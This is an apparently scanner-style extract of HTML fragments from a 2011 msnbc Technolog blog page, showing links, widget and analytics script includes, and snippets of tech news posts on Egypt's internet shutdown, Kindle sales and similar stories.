<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/ffb30d0d6c6ea0fa18ad06ed093685a55fe064e8.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/6fcc5bd2a149dc02951529f95ade36053a0ff882.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=53290623&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;58:58:178;58:58:178;58:58:178;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://technolog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;href=http://www.facebook.com/pages/Technolog/108546889203630" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<p>"If you go beyond the weekend, real damage is done to capital flow and banking," Neil Hicks, international policy analyst for <a href="http://www.humanrightsfirst.org/">Human Rights First</a> told msnbc.com, citing a report from the <a href="http://www.eiu.com/public/">Economist Intelligence Unit</a>
...[SNIP]...
<p>It's counterproductive, Hicks explained, citing Secretary of State Hillary Clinton's&nbsp;<a href="http://www.state.gov/secretary/rm/2010/01/135519.htm">January 21 speech on Internet freedom</a>
...[SNIP]...
<p>"We've never had a lab in which to see what percentage of a country's economy relies on the Internet," Jim Cowie, chief technology officer of the global Internet monitoring firm <a href="http://renesys.com/about/index.shtml">Renesys</a>
...[SNIP]...
<em>Catch up with Wilson on Twitter at&nbsp;<a href="http://www.twitter.com/wjrothman">@wjrothman</a>, or join our conversation at the&nbsp;<a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942650-net-less-egypt-may-face-economic-doom-monday" data-Text="Net-less Egypt may face economic doom Monday">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5942650-net-less-egypt-may-face-economic-doom-monday" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5942669" data-contentId="5942669" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5942669.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg" width="600" height="672" alt="" /><p class="photo_credit">
...[SNIP]...
<p>Anyhoo &hellip; T-Pain really likes Facebook too &hellip; at least his latest tattoo indicates such. The Grammy-winning hip-hop artist shared a picture of his new ink on Twitter today, <a href="http://twitter.com/#!/NBTPAIN/status/30855244816584704">with this explanation </a>
...[SNIP]...
<div id="vine-inlinePhoto__5942671" data-contentId="5942671" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:238px;"><img id="helenaspopkin/5942671.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg" width="238" height="320" alt="" /><!-- end5942671 -->
...[SNIP]...
</param><embed src="http://www.youtube.com/v/w0nFpwPuk8E&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<em>Helen A.S. Popkin writes about the Internet ... a lot. Follow&nbsp;her on <a href="http://twitter.com/helenaspopkin"><span>
...[SNIP]...
</a> and/or <a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><span>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" data-Text="T-Pain's Facebook tattoo so hardcore, it's hexacore!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5942421" data-contentId="5942421" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5942421.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942421.jpg" width="600" height="339" alt="" /><!-- end5942421 -->
...[SNIP]...
<em><a href="http://techcrunch.com/2011/01/28/egypt/">via TechCrunch</a>
...[SNIP]...
<div id="vine-inlineCode__5942398" class="inlineCode photo_align_block" data-contentid="5942398"><script src="http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630"></script>
...[SNIP]...
<em>Join the coversation on our <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942345-jon-stewart-questions-egypts-twitter-revolution" data-Text="Jon Stewart questions Egypt's 'Twitter revolution'">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5942345-jon-stewart-questions-egypts-twitter-revolution" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>A spam message wishing a Russian woman happy new year may very well have killed her, and saved hundreds of intended targets, according to an account by <a target="_blank" href="http://www.telegraph.co.uk/news/worldnews/europe/russia/8284279/Black-Widow-attempted-New-Year-Moscow-attack-but-blew-herself-up-by-mistake.html">The Telegraph's Moscow correspondent, Andrew Osborn</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942012-did-spam-text-kill-a-russian-suicide-bomber" data-Text="Did spam text kill a Russian suicide bomber?">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5942012-did-spam-text-kill-a-russian-suicide-bomber" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>The vast majority of urban Egyptians, 78 percent, feel that it is, according to a <a href="http://news.bbc.co.uk/2/hi/8548190.stm">BBC World Service survey</a>
...[SNIP]...
<p class="p1">"It's freedom of expression that is a long-standing core right,"&nbsp;Neil Hicks, international policy adviser for <a href="http://www.humanrightsfirst.org/">Human Rights First</a>
...[SNIP]...
<p class="p1">Outrage around the world centers on this issue. Cynthia Wong, international project director for the&nbsp;<a href="http://www.cdt.org/">Center for Democracy &amp; Technology</a>
...[SNIP]...
<p class="p1">But when <a href="http://gizmodo.com/5745478/is-internet-access-a-human-right">the same question was posed by our friend Joel Johnson on the tech blog Gizmodo</a>
...[SNIP]...
<em>Catch up with Wilson on Twitter at <a href="http://www.twitter.com/wjrothman">@wjrothman</a>, or join our conversation at the <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5941854-is-internet-access-a-human-right" data-Text="Is Internet access a human right?">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5941854-is-internet-access-a-human-right" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>"Under Egyptian legislation the authorities have the right to issue such an order and we are obliged to comply with it," Vodafone, one of the largest cell phone carriers, in Egypt, <a href="http://www.vodafone.com/content/index/press.html" target="_blank" class="vt-p">said in a statement</a>
...[SNIP]...
means because "what the government does is very effective for stopping the most basic users, meaning average users, the folks who probably aren't Twitter users," says Philip N. Howard, director of the <a href="http://www.pitpi.org/" target="_blank" class="vt-p">Project on Information Technology and Political Islam</a>
...[SNIP]...
<strong><a class="vt-p" target="_blank" href="http://twitter.com/malexjohnson">Follow M. Alex Johnson on Twitter</a>
...[SNIP]...
<strong><a class="vt-p" target="_blank" href="http://www.facebook.com/pages/Alex-Johnson-msnbccom/136854296350964">Follow M. Alex Johnson on Facebook</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5941852-this-is-about-social-networks-that-are-beyond-the-reach-of-mubarak" data-Text="'This is about social networks that are beyond the reach of Mubarak'">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5941852-this-is-about-social-networks-that-are-beyond-the-reach-of-mubarak" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5941352" data-contentId="5941352" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="athima-chansanchai/5941352.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/athima-chansanchai/5941352.jpg" width="600" height="400" alt="" /><p class="photo_credit">
...[SNIP]...
<div id="vine-inlinePhoto__5941346" data-contentId="5941346" class="inlinePhoto photo_portrait photo_align_right user_inline_photo" style="width:280px;"><img id="athima-chansanchai/5941346.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/athima-chansanchai/5941346.jpg" width="280" height="420" alt="" /><div class="photo_credit_container">
...[SNIP]...
</a>, hoping the world won't see more photos like these (from <a href="http://www.flickr.com/photos/aljazeeraenglish/" target="_blank">Al Jazeera's Flickr photostream</a>
...[SNIP]...
<p>Searching for <a href="http://www.youtube.com/results?search_query=mubarak+protest&amp;aq=f" target="_blank">"Mubarak protest" on YouTube will yield hundreds of videos</a>, several taken in the last few days by news crews embedded in Egypt, as will "<a href="http://www.youtube.com/results?search_query=egypt+protest+2011&amp;aq=0sx" target="_blank">Egypt Protest 2011</a>
...[SNIP]...
<p>This video comes via a collection put together by <a href="http://mashable.com/2011/01/27/youtube-flickr-show-escalating-violence-in-egyptian-protests/" target="_blank">Mashable</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/JORCXkSKvf0&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<p>And while attempts have been made to stifle Twitter and Facebook feeds, undeniable proof of the protests continue to come through, like this video, which I found from a Twitter link that led to a <a href="http://www.facebook.com/anarchismnews/posts/180233175348223" target="_blank">Facebook page</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/xnQgaMOZLRc&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/q_AF1t1KeZ8&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see" data-Text="What the Egyptian government doesn't want you to see">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5941467" data-contentId="5941467" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5941467.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5941467.jpg" width="600" height="450" alt="" /><!-- end5941467 -->
...[SNIP]...
startling efficiency with which a government can isolate a country that has few telecom providers. The action is also far and above any previous any Internet shutdown connected to political unrest, as <a href="http://www.renesys.com/blog/2011/01/egypt-leaves-the-internet.shtml">Jame's Cowie points out in the Renesys blog</a>
...[SNIP]...
<em><a href="http://www.renesys.com/blog/2011/01/egypt-leaves-the-internet.shtml">Renesys</a> via <a href="http://www.businessinsider.com/sai">Business Insider</a>
...[SNIP]...
<p>Join the coversation on our <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5941456-infograph-egypt-drops-off-the-internet" data-Text="Infograph: Egypt drops off the Internet">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5941456-infograph-egypt-drops-off-the-internet" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5941146" data-contentId="5941146" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="athima-chansanchai/5941146.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/athima-chansanchai/5941146.jpg" width="280" height="93" alt="" /><!-- end5941146 -->
...[SNIP]...
<p>"I had the Facebook for one purpose &mdash;&nbsp;to keep in contact with my family," Fteja told <a href="http://www.nydailynews.com/ny_local/2011/01/26/2011-01-26_man_sues_facebook_claiming_socialnetworking_site_shut_down_his_account_for_no_re.html" target="_blank">The Daily News</a>
...[SNIP]...
<p>There are a lot of mines to step on that could result in Facebook shutting down someone's account, according to its <a href="http://www.facebook.com/terms.php" target="_blank">terms of service</a>
...[SNIP]...
<p>"I know one thing - I didn't do anything," he told <a href="http://www.nypost.com/f/print/news/local/staten_island/si_man_hits_facebook_with_suit_rMmqxdBwUg9UJpHI8WIDIK" target="_blank">The New York Post</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5940974-facebook-deprived-man-sues-for-500k" data-Text="Facebook-deprived man sues for $500K">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5940974-facebook-deprived-man-sues-for-500k" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5940889" data-contentId="5940889" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="athima-chansanchai/5940889.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/athima-chansanchai/5940889.jpg" width="280" height="280" alt="" /><!-- end5940889 -->
...[SNIP]...
</a> we knew it'd only be a matter of time before we heard the announcement that Kindle books outsell paperback books. And now, about a month after that Kindle announcement, <a target="_blank" href="http://phx.corporate-ir.net/phoenix.zhtml?c=176060&amp;p=irol-newsArticle&amp;ID=1521090&amp;highlight=">it's here</a>
...[SNIP]...
<p>Since the beginning of the year, for every 100 paperback books Amazon has sold, the Company has sold 115 Kindle books. <a target="_blank" href="http://techcrunch.com/2010/07/19/kindle-sales/">In July, Kindle books surpassed hardcovers, selling 143 for every 100.</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5940731-kindle-books-now-outsell-paperbacks" data-Text="Kindle books now outsell paperbacks">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5940731-kindle-books-now-outsell-paperbacks" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5940823" data-contentId="5940823" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="helenaspopkin/5940823.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5940823.jpg" width="280" height="157" alt="" /><p class="photo_credit">
...[SNIP]...
</a>&nbsp;&mdash; but as of yesterday, the Egyptian government pretty much took the entire country offline. <a href="http://www.renesys.com/blog/2011/01/egypt-leaves-the-internet.shtml">Here's what that looks like</a>
...[SNIP]...
<p>Meanwhile, the <a href="http://www.wired.com/threatlevel/2011/01/fbi-anonymous/">U.S. government knocked down dozens of doors </a>
...[SNIP]...
<p>It's now OK for photographers to take pictures outside public places and federal buildings &mdash; <a href="http://www.crunchgear.com/2011/01/27/photographers-youre-now-officially-free-to-shoot-in-public-places-and-outside-federal-buildings/">so there's, that</a>
...[SNIP]...
<p>Some dude on Staten Island is <a href="http://www.nypost.com/p/news/local/manhattan/antisocial_network_WIiiaZ4tHPBHHlXx4GuG5I">suing Facebook for $500,000 </a>
...[SNIP]...
<p>The white iPhone of legend made another short appearance &mdash; <a href="http://www.mobilecrunch.com/2011/01/27/the-elusive-white-iphone-appears-on-the-german-apple-website/">this time on the German Apple website </a>
...[SNIP]...
<p>Yeah, don't expect a lot of AT&amp;T iPhone subscribers to jump ship when Verizon's version rolls around &mdash; <a href="http://digitaldaily.allthingsd.com/20110128/90-percent-of-att-iphone-subs-still-under-contract/?mod=twitter&amp;utm_source=twitterfeed&amp;utm_medium=twitter">90 percent of them are under contract</a>
...[SNIP]...
<p>Virgin is axing its <a href="http://consumerist.com/2011/01/virgin-mobile-adding-5gb-cap-and-throttle-21511.html">unlimited mobile broadband plan</a>
...[SNIP]...
<p>Amazon now sells <a href="http://techcrunch.com/2011/01/27/kindle-books-overtake-paperback-books-to-become-amazons-most-popular-format/">more Kindle books than paperbacks</a>
...[SNIP]...
<p>Hey! It's an online <a href="http://www.boingboing.net/2011/01/28/online-science-ficti.html?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed%3A+boingboing%2FiBag+%28Boing+Boing%29">Sci Fi writing website from Star Ship Sofa</a>
...[SNIP]...
<span id="ppt19818077">"Man&nbsp;vs. Wild's" Bear Grylls vs. "Survivorman's" Les Stroud in an<a href="http://www.urlesque.com/2011/01/27/bear-grylls-vs-les-stroud/"> Internet fight to the death! </a>
...[SNIP]...
</em><a href="http://twitter.com/helenaspopkin"><i>
...[SNIP]...
</em><a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5940742-pre-caffeine-tech-man-vs-the-internet" data-Text="Pre-caffeine tech: Man vs. the Internet!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/28/5940742-pre-caffeine-tech-man-vs-the-internet" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>Computer scientist <a target="_blank" href="http://blog.stephenwolfram.com/2011/01/jeopardy-ibm-and-wolframalpha/">Stephen Wolfram</a>, the brains behind <a target="_blank" href="http://www.wolframalpha.com/">WolframAlpha</a>, tested how often the correct answers to "Jeopardy" questions appear in the title or text snippets of the results page on <a target="_blank" href="http://www.google.com/">Google</a>, <a target="_blank" href="http://www.bing.com/">Bing</a>
...[SNIP]...
wer on its result page 69 percent of the time. Ask.com's page&nbsp;had the correct answer 68 percent of the time. Bing registered a 63 percent success rate, and&nbsp;Yandex&nbsp;came in at 62 percent. <a target="_blank" href="http://blekko.com/">Blekko</a> (58 percent) and <a target="_blank" href="http://en.wikipedia.org/wiki/Main_Page">Wikipedia</a>
...[SNIP]...
<p>That's where the <a target="_blank" href="http://www-03.ibm.com/innovation/us/watson/">IBM Watson</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/12rNbGf2Wwo&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
e is great&nbsp;for answering questions from unstructured data. This has potential real-world applications such as mining medical documents or patents, and doing discovery in litigation, he notes in a <a target="_blank" href="http://blog.stephenwolfram.com/2011/01/jeopardy-ibm-and-wolframalpha/">blog post</a>
...[SNIP]...
<hr width="100%" size="2" align="center" />
<a target="_blank" href="http://www.byjohnroach.com/"><i>
...[SNIP]...
</i><a target="_blank" href="http://www.facebook.com/cosmiclog"><i>
...[SNIP]...
</i><a href="http://twitter.com/b0yle"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://cosmiclog.msnbc.redacted/_news/2011/01/27/5935463-search-engines-could-play-jeopardy?chromedomain=technolog" data-Text="Search engines could play 'Jeopardy'">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://cosmiclog.msnbc.redacted/_news/2011/01/27/5935463-search-engines-could-play-jeopardy?chromedomain=technolog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5936454" data-contentId="5936454" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5936454.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5936454.jpg" width="600" height="335" alt="" /><p class="photo_credit">
...[SNIP]...
<p>Weary of "therapist-shopping clients" crowing about the many credentials of cut-rate counselors, and alarmed at how easy it is to obtain such credentials over the Internet, Dr. Eichel launched the "<a href="http://www.dreichel.com/dr_zoe.htm#Zoe follow-up">Cat Credentialing Project</a>
...[SNIP]...
